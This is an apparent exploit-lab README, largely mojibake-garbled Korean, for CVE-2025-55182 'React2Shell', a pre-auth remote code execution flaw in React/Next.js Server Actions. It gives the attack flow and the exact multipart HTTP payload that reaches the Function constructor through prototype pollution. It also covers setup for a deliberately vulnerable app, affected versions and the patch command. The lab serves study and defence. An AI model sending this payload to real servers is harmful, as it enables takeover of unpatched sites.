Share
## https://sploitus.com/exploit?id=CEAD464C-06DF-5281-85C5-8A7C00FEAC94
# CVE-2025-55182 React2Shell 취약점 μ‹€μŠ΅
> μ‚¬μš©λœ AI : Claude Opus 4.5
> **⚠️ κ²½κ³ **: 이 ν™˜κ²½μ€ **ꡐ윑 및 연ꡬ λͺ©μ **으둜만 μ‚¬μš©ν•˜μ„Έμš”.

## 취약점 κ°œμš”

| ν•­λͺ© | λ‚΄μš© |
|------|------|
| **CVE** | CVE-2025-55182 (React) / CVE-2025-66478 (Next.js) |
| **이름** | React2Shell |
| **CVSS** | 10.0 (Critical) |
| **μœ ν˜•** | Pre-Auth Remote Code Execution |
| **원인** | Flight ν”„λ‘œν† μ½œ 역직렬화 μ‹œ ν”„λ‘œν† νƒ€μž… μ˜€μ—Ό |

## 곡격 원리

```
                    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                    β”‚     Attacker            β”‚
                    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                β”‚
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                β”‚
                                β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚                     Next.js Server                        β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  1. Next-Action 헀더 β†’ Server Action 트리거                  β”‚
β”‚  2. multipart νŽ˜μ΄λ‘œλ“œ β†’ Flight ν”„λ‘œν† μ½œ 역직렬화                β”‚
β”‚  3. Fake Chunk 객체의 then() λ©”μ„œλ“œ 호좜                       β”‚
β”‚  4. __proto__ μ°Έμ‘° β†’ ν”„λ‘œν† νƒ€μž… μ˜€μ—Ό                           β”‚
β”‚  5. Function μƒμ„±μž μ£Όμž… β†’ RCE                               β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

### μ΅μŠ€ν”Œλ‘œμž‡ νŽ˜μ΄λ‘œλ“œ ꡬ쑰

```http
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--
```

**핡심 μš”μ†Œ:**
- `Next-Action` ν—€λ”λ‘œ Server Action 트리거
- Field 0: Fake Chunk with `then` method for promise-like behavior
- Field 1: `$@0` 참쑰둜 ν”„λ‘œν† νƒ€μž… 체인 순회
- `__proto__:then`을 톡해 `Function` μƒμ„±μž μ ‘κ·Ό

---

## λΉ λ₯Έ μ‹œμž‘

```bash
cd vulnerable-app

# μ˜μ‘΄μ„± μ„€μΉ˜
npm install

# 개발 μ„œλ²„ μ‹œμž‘
npm run dev
```

http://localhost:3000 μ—μ„œ 접속

---

## 디렉토리 ꡬ쑰

```
react-rce/
β”œβ”€β”€ README.md
β”œβ”€β”€ vulnerable-app/          # μ·¨μ•½ν•œ Next.js μ•±
β”‚   β”œβ”€β”€ package.json         # Next.js 15.0.3 (μ·¨μ•½ 버전)
β”‚   └── app/
β”‚       β”œβ”€β”€ page.js          # UI (CVE 정보 + RCE μ‹œμ—°)
β”‚       β”œβ”€β”€ actions.js       # Server Actions
β”‚       └── globals.css
└── exploit/                 # 곡격 도ꡬ (선택)
    └── exploit.py           # CVE-2025-55182 PoC
```

---

## 영ν–₯ λ°›λŠ” 버전

- **React**: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- **Next.js**: 15.x, 16.x (App Router μ‚¬μš© μ‹œ)
- **νŒ¨ν‚€μ§€**: react-server-dom-webpack, react-server-dom-turbopack

---

## λ°©μ–΄ 방법

```bash
# 패치 λ²„μ „μœΌλ‘œ μ—…κ·Έλ ˆμ΄λ“œ
npm install next@15.5.7 react@19.2.1 react-dom@19.2.1
```

---

## μ°Έκ³ 

- [Next.js λ³΄μ•ˆ 곡지](https://nextjs.org/blog/CVE-2025-66478)
- [GitHub: assetnote/react2shell-scanner](https://github.com/assetnote/react2shell-scanner)
- [GitHub: freeqaz/react2shell](https://github.com/freeqaz/react2shell)